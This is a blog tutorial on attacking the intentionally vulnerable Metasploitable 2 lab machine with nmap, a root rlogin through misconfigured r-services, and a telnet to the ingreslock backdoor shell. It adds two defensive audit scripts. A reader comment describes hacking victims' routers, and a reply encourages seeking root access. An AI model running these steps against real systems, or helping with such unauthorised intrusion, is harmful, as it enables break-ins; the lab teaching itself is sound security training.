Thursday, May 1, 2014

Metasploitable 2 : Vulnerability assessment and Remote Login

If you've followed my previous tutorial on Introduction to Metasploitable 2, then you should be sitting here with Kali Linux and Metasploitable 2 up and running. So, I'm gonna skip the formalities and move right ahead.


Portscan

On the Kali Linux machine, open a terminal. Type ifconfig and note the eth0 IP address. This gives you an idea of what the IP of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131, which means that Metasploitable must have an IP somewhere in the 192.168.154.xxx range. To scan the hosts in that range for open ports, you can use an Nmap SYN scan. Here is what it should look like.
nmap -sS 192.168.154.0/24




The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. It also has a large number of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the Metasploitable machine, after logging in with msfadmin:msfadmin, you can run ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever it is in your case).

Vulnerabilities

The Metasploitable 2 operating system has been loaded with a large number of vulnerabilities. They fall into the following kinds:
  1. Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
  2. Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
  3. Weak Passwords - These are vulnerable to bruteforce attacks.
  4. Vulnerable Web Services - A few web services pre-installed on Metasploitable have known vulnerabilities which can be exploited.
  5. Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very useful article about many of these vulnerabilities on the Rapid7 website.

Exploiting The Vulnerabilities

Remote access vulnerability - Rlogin

Remember the list of open ports that you came across during the port scan? Ports 512, 513 and 514 are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to log in to Metasploitable 2 remotely. Type rlogin to see the details of the command structure.


root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
           [-D [bind_address:]port] [-e escape_char] [-F configfile]
           [-I pkcs11] [-i identity_file]
           [-L [bind_address:]port:host:hostport]
           [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
           [-R [bind_address:]port:host:hostport] [-S ctl_path]
           [-W host:port] [-w local_tun[:remote_tun]]
           [user@]hostname [command] 
 
rlogin -l root 192.168.154.132
Most probably you will get something like this:

root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password: 

As you can see, it is asking for a password. That's not because the target is not vulnerable. It's because we don't have rsh-client installed on Kali Linux, so the rlogin command is being handled by ssh (note the ssh usage message and the RSA host key prompt above). The rsh-client package is a remote login utility that allows users to connect to remote machines.
apt-get install rsh-client
This will start the installation process. You'll have to type yes once or twice, and Kali will do the rest for you. After the installation succeeds, try your previous command again. This time around, things will be better.



root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May  1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~# 

Now you have an administrator-privilege shell on Metasploitable 2. That was as easy as typing one line (and installing an application). We have one more such vulnerability that can be exploited easily.
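
A defender's check for the misconfiguration described above, as an added example that is not part of the original tutorial: r-services skip authentication when a trust file (/etc/hosts.equiv or a user's ~/.rhosts) contains a + wildcard, and this script flags such entries. The page does not say which file is involved, so the script checks both; the sample entries and host names are constructed.

```python
"""Audit r-services trust files for wildcard entries (added example)."""
import os
import pwd

# Constructed sample in .rhosts / hosts.equiv syntax: "host [user]"; "+" is a wildcard.
SAMPLE_RHOSTS = """\
# constructed sample, not taken from a real host
+ +
buildhost.example.lan deploy
backup.example.lan +
-oldhost.example.lan
"""

def audit_trust_text(text, source="<sample>"):
    """Return (source, line_no, entry, reason) for entries that trust any host or user."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split("#", 1)[0].split()
        if not fields or fields[0].startswith("-"):
            continue  # blank line, comment, or explicit deny entry
        host = fields[0]
        user = fields[1] if len(fields) > 1 else ""
        if host == "+" and user == "+":
            reason = "any user from any host"
        elif host == "+":
            reason = "any host"
        elif user == "+":
            reason = "any user on " + host
        else:
            continue
        findings.append((source, line_no, " ".join(fields), reason))
    return findings

def audit_system():
    """Check /etc/hosts.equiv and every account's ~/.rhosts on the local machine."""
    paths = {"/etc/hosts.equiv"}
    paths.update(os.path.join(p.pw_dir, ".rhosts") for p in pwd.getpwall())
    findings = []
    for path in sorted(paths):
        try:
            with open(path, errors="replace") as fh:
                findings += audit_trust_text(fh.read(), path)
        except OSError:
            continue  # file absent or not readable by this user
    return findings

if __name__ == "__main__":
    for source, line_no, entry, reason in audit_trust_text(SAMPLE_RHOSTS) + audit_system():
        print(f"{source}:{line_no}: '{entry}' trusts {reason}")
```

Run it as root on the machine being audited so that every account's ~/.rhosts is readable.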

Telnet Vulnerability

Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploitable contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can log in to the computer without knowing the credentials, just by using :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then, something to whet your appetite:
telnet 192.168.99.131 1524
This is another one-line exploit, on the ingreslock port 1524 (see the portscan result); substitute your own Metasploitable IP in the command. I will post more stuff soon, but this is all for now.
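
To check a host for the listeners named on this page (ports 512 to 514, 1524 and 6200), this added example, which is not part of the original tutorial, parses the kernel's /proc/net/tcp socket table. The sample table is constructed, and the port labels are the example's own.

```python
"""Flag sockets bound to the ports this page discusses (added example)."""

# Ports named on the page; the labels are this example's own wording.
WATCHED = {
    512: "r-services (rexec)",
    513: "r-services (rlogin)",
    514: "r-services (rsh)",
    1524: "ingreslock",
    6200: "vsftpd backdoor shell",
}

# Socket state codes used in /proc/net/tcp.
STATES = {"0A": "LISTEN", "01": "ESTABLISHED"}

# Constructed sample in /proc/net/tcp layout (addresses and ports are hexadecimal).
SAMPLE = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5001
   1: 00000000:0201 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5002
   2: 00000000:05F4 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5003
   3: 849AA8C0:1838 839AA8C0:C350 01 00000000:00000000 00:00000000 00000000     0        0 5004
"""

def watched_sockets(table_text):
    """Return sorted (port, state, label) for sockets whose local port is watched."""
    hits = set()
    for line in table_text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        port = int(fields[1].rsplit(":", 1)[1], 16)  # local_address is HEXIP:HEXPORT
        state = STATES.get(fields[3])
        if port in WATCHED and state:
            hits.add((port, state, WATCHED[port]))
    return sorted(hits)

if __name__ == "__main__":
    try:
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE  # not on Linux: fall back to the constructed sample
    for port, state, label in watched_sockets(table):
        print(f"port {port} {state}: {label}")
```

An ESTABLISHED row on port 6200 or 1524 means a session is already connected to that port, not just that it is exposed. The same parser also accepts /proc/net/tcp6.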

12 comments:

  1. Hi, found something to add.
    Users need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.

    1. Please elaborate. I didn't get you. Are you talking about the port-scan step?

  2. Hi, I have hacked some routers (TP_Link and D_Link), so I have full, complete access
    to the victim's router web interface (my OS = Kali). Is there any way to sniff PC data traffic behind NAT (except DNS spoofing)?

    1. Web Interface is nice but yields little. You need to gain root access if you want to get anywhere.

  3. Where can I find the rest of your tutorials on this?

  4. Hi,
    First, amazing site, love it.
    Second, I can't find any ports.
    My laptop runs Kali and my PC runs the Metasploitable2 VM.
    I use nmap and get this:
    Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn (I tried it, not working either)
    Nmap done: 1 IP address (0 hosts up)
    What do I need to do?
    Thanks.

    1. You must ensure your Metasploitable is up and running when scanning.

  5. Your Metasploitable2 must be up and running when you are testing.

  6. Scanning with nmap shows all ports are filtered. What should I do?

    1. Turn off the firewall, or slow down the scan so the firewall doesn't detect it. Also experiment with scan types.

  7. Hi,

    I followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!


© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.